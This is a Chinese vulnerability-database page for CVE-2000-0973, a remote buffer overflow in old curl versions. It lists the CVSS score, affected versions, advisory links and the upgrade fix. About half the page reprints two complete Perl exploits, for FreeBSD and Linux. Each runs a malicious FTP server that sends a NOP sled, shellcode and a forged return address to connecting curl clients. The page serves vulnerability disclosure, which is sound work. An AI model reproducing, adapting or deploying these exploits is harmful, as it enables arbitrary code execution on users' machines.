CVE-2000-0973
CVSS10.0
发布时间 :2000-12-19 00:00:00
修订时间 :2008-09-05 16:22:19
NMCOE    

[原文]Buffer overflow in curl earlier than 6.0-1.1, and curl-ssl earlier than 6.0-1.2, allows remote attackers to execute arbitrary commands by forcing a long error message to be generated.


[CNNVD]curl缓冲区溢出漏洞(CNNVD-200012-172)

        curl 6.0-1.1之前版本以及curl-ssl 6.0-1.2之前版本存在缓冲区溢出漏洞。远程攻击者可以通过强制产生超长错误信息执行任意命令。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:daniel_stenberg:curl:7.4
cpe:/a:daniel_stenberg:curl:7.2.1
cpe:/a:daniel_stenberg:curl:6.4
cpe:/a:daniel_stenberg:curl:7.3
cpe:/a:daniel_stenberg:curl:6.5.1
cpe:/a:daniel_stenberg:curl:7.1.1
cpe:/a:daniel_stenberg:curl:7.1
cpe:/a:daniel_stenberg:curl:6.5.2
cpe:/a:daniel_stenberg:curl:6.0
cpe:/a:daniel_stenberg:curl:7.2
cpe:/a:daniel_stenberg:curl:6.1
cpe:/a:daniel_stenberg:curl:6.3
cpe:/a:daniel_stenberg:curl:6.1beta
cpe:/a:daniel_stenberg:curl:6.5

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0973
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0973
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200012-172
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/static/5374.php
(VENDOR_ADVISORY)  XF  curl-error-bo
http://www.securityfocus.com/bid/1804
(VENDOR_ADVISORY)  BID  1804
http://archives.neohapsis.com/archives/bugtraq/2000-10/0331.html
(UNKNOWN)  REDHAT  RHBA-2000:092-01
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-00:72.curl.asc
(UNKNOWN)  FREEBSD  FreeBSD-SA-00:72

- 漏洞信息

curl缓冲区溢出漏洞
危急 缓冲区溢出
2000-12-19 00:00:00 2005-05-02 00:00:00
远程  
        curl 6.0-1.1之前版本以及curl-ssl 6.0-1.2之前版本存在缓冲区溢出漏洞。远程攻击者可以通过强制产生超长错误信息执行任意命令。

- 公告与补丁

        

- 漏洞信息 (20292)

cURL 6.1 - 7.4 Remote Buffer Overflow Vulnerability (1) (EDBID:20292)
freebsd remote
2000-10-13 Verified
0 zillion
N/A [点击下载]
source: http://www.securityfocus.com/bid/1804/info

Curl is an open-source utility for sending or receiving files using URL syntax. A vulnerability exists in the version of curl included with Debian GNU/Linux 2.2 and FreeBSD (prior to 4.2 release). 

Note that cURL runs on other platforms as well, and earlier versions may be also vulnerable. 

Curl's error-logging feature improperly tests the size of generated error messages, which are sent from a remote host. A malicious remote server could send a maliciously-formed response to a request from curl, designed to exceed the maximum length of the error buffer. The contents of this oversized buffer, when copied onto the stack, can potentially overwrite the calling functions' return address. This can alter the program's flow of execution and result in arbitrary code being run on the client host.

#!/usr/bin/perl
#
# Remote FreeBSD cURL exploit for versions 6.1 - 7.4
#
# Written by zillion (at http://www.safemode.org && http://www.xsnosoft.com)
#
# This exploit may only be used for testing purposes. More information 
# about the used vulnerability can be found on securityfocus:
#
# http://online.securityfocus.com/bid/1804
#
# The shellcode will write "Ha! Owned by a cURL!" to stdout on the system
# running cURL. The extra nops are needed because the buffer, which causes
# the overflow, is altered.
#
# $ ./curl -s ftp://xxx.xxx.xxx.xxx:21/
# Ha! Owned by a cURL! 

use IO::Socket;
use Net::hostent;

########################################################################

$shellcode = 
        "\xeb\x14\x5e\x31\xc0\x6a\x14\x56\x40\x40\x50\xb0\x04\x50\xcd".
        "\x80\x31\xc0\x40\x50\xcd\x80\xe8\xe7\xff\xff\xff\x48\x61\x21".
        "\x20\x4f\x77\x6e\x65\x64\x20\x62\x79\x20\x61\x20\x63\x55\x52".
        "\x4c\x21\x23".

         "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";

while($_ = $ARGV[0], /^-/) {
    shift;       
    last if /^--$/;
    /^-p/ && do { $port = shift; };
    /^-l/ && do { $list = 1; };
    /^-o/ && do { $offset = shift; };
}


$id     = `id -u`; chop($id);
$size   =  225;
$esp    =  0xbfbffbd4;
$offset =  -140 unless $offset;
$port   =  21 unless $port;

if(!$list || $port > 1024 && $id != 0) {

print <<"TWENTE";

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+

   Usage :  $0 -l 
   Option:  $0 -p <port to listen on>
   Option:  $0 -o <offset>

   Note: low ports require root privileges

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+

TWENTE
exit;

}

for ($i = 0; $i < ($size - length($shellcode)) - 4; $i++) {
    $buffer .= "\x90";
}

$buffer .= $shellcode;
$buffer .= pack('l', ($esp + $offset)); 

print("We are using return address: 0x", sprintf('%lx',($esp - $offset)), "\n");
print "Starting to listen for incomming connections on port $port\n";

my $sock = new IO::Socket::INET (
                                 LocalPort => $port,
                                 Proto => 'tcp',
                                 Listen => 1,
                                 Reuse => 1,
                                );
die "Could not create socket: $!\n" unless $sock;

while($cl = $sock->accept()) {

   $hostinfo = gethostbyaddr($cl->peeraddr);
   printf "[Received connect from %s]\n", $cl->peerhost;
   print $cl "220 Safemode.org FTP server (Version 666) ready.\n";
   print $cl "230 Ok\n";
   print $cl "227 $buffer\n";
   sleep 2;

}		

- 漏洞信息 (20293)

cURL 6.1 - 7.4 Remote Buffer Overflow Vulnerability (2) (EDBID:20293)
linux remote
2000-10-13 Verified
0 zillion
N/A [点击下载]
source: http://www.securityfocus.com/bid/1804/info
 
Curl is an open-source utility for sending or receiving files using URL syntax. A vulnerability exists in the version of curl included with Debian GNU/Linux 2.2 and FreeBSD (prior to 4.2 release).
 
Note that cURL runs on other platforms as well, and earlier versions may be also vulnerable.
 
Curl's error-logging feature improperly tests the size of generated error messages, which are sent from a remote host. A malicious remote server could send a maliciously-formed response to a request from curl, designed to exceed the maximum length of the error buffer. The contents of this oversized buffer, when copied onto the stack, can potentially overwrite the calling functions' return address. This can alter the program's flow of execution and result in arbitrary code being run on the client host.

#!/usr/bin/perl
#
# Remote linux cURL exploit for versions 6.1 - 7.4
#
# Written by zillion (at http://safemode.org && http://www.snosoft.com)
# 
# This exploit, which has been tested to work with cURL 6.4, 7.2 and 7.3,  
# may only be used for testing purposes. Additionally, the author does not 
# take any resposibilities for abuse of this file. More information about  
# the used vulnerability can be found on securityfocus:
#
# http://online.securityfocus.com/bid/1804
#
# The shellcode will write "Owned by a cURL ;)" to the file /tmp/0wned.txt
# You can replace it with whatever you want but be warned: due to buffer 
# manipilation working shellcode might be altered.
#
# A FreeBSD version is also available on safemode.org

use IO::Socket;
use Net::hostent;

$shellcode = # does a open() write() close() and exit(). 
        "\xeb\x40\x5e\x31\xc0\x88\x46\x0e\xc6\x46\x21\x09\xfe\x46\x21".
        "\x88\x46\x22\x8d\x5e\x0f\x89\x5e\x23\xb0\x05\x8d\x1e\x66\xb9".
        "\x42\x04\x66\xba\xe4\x01\xcd\x80\x89\xc3\xb0\x04\x8b\x4e\x23".
        "\x66\xba\x0f\x27\x66\x81\xea\xfc\x26\xcd\x80\xb0\x06\xcd\x80".
        "\xb0\x01\x31\xdb\xcd\x80\xe8\xbb\xff\xff\xff\x2f\x74\x6d\x70".
        "\x2f\x30\x77\x6e\x65\x64\x2e\x74\x78\x74\x23\x30\x77\x6e\x65".
        "\x64\x20\x62\x79\x20\x61\x20\x63\x55\x52\x4c\x20\x3b\x29";

while($_ = $ARGV[0], /^-/) {
    shift;       
    last if /^--$/;
    /^-p/ && do { $port = shift; };
    /^-l/ && do { $list = 1; };
    /^-o/ && do { $offset = shift; };
}


$id     = `id -u`; chop($id);
$size   =  249;
$esp    =  0xbffff810;
$offset =  -150 unless $offset;
$port   =  21 unless $port;

if(!$list || $port > 1024 && $id != 0) {

print <<"TWENTE";

   Usage :  $0 -l 
   Option:  $0 -p <port to listen on>
   Option:  $0 -o <offset>

   Note: low ports require root privileges

TWENTE
exit;

}

for ($i = 0; $i < ($size - length($shellcode)) - 4; $i++) {
    $buffer .= "\x90";
}

$buffer .= "$shellcode";
$buffer .= pack('l', ($esp + $offset)); 

print("Listening on port $port. We are using return address: 0x", sprintf('%lx',($esp - $offset)), "\n");

my $sock = new IO::Socket::INET (
                                 LocalPort => $port,
                                 Proto => 'tcp',
                                 Listen => 1,
                                 Reuse => 1,
                                );
die "Could not create socket: $!\n" unless $sock;

while($cl = $sock->accept()) {

   $hostinfo = gethostbyaddr($cl->peeraddr);
   printf "[Received connect from %s]\n", $hostinfo->name || $cl->peerhost;
   print $cl "220 Safemode.org FTP server (Version 666) ready.\n";
   print $cl "230 Ok\n";
   print $cl "227 $buffer\n";
   sleep 2;

}		

- 漏洞信息

1612
cURL / curl-ssl Error Message Handling Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- 漏洞描述

cURL and cURL SSL contain an overflow condition in the handling of error messages. The issue is triggered as user-supplied input is not properly validated when handling error messages. With a specially crafted request causing an overly long error message, a remote attacker can cause a buffer overflow, resulting in a denial of service or potentially execution of arbitrary code.

- 时间线

2000-10-13 Unknow
2000-10-13 2000-10-16

- 解决方案

Upgrade to version 7.4.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站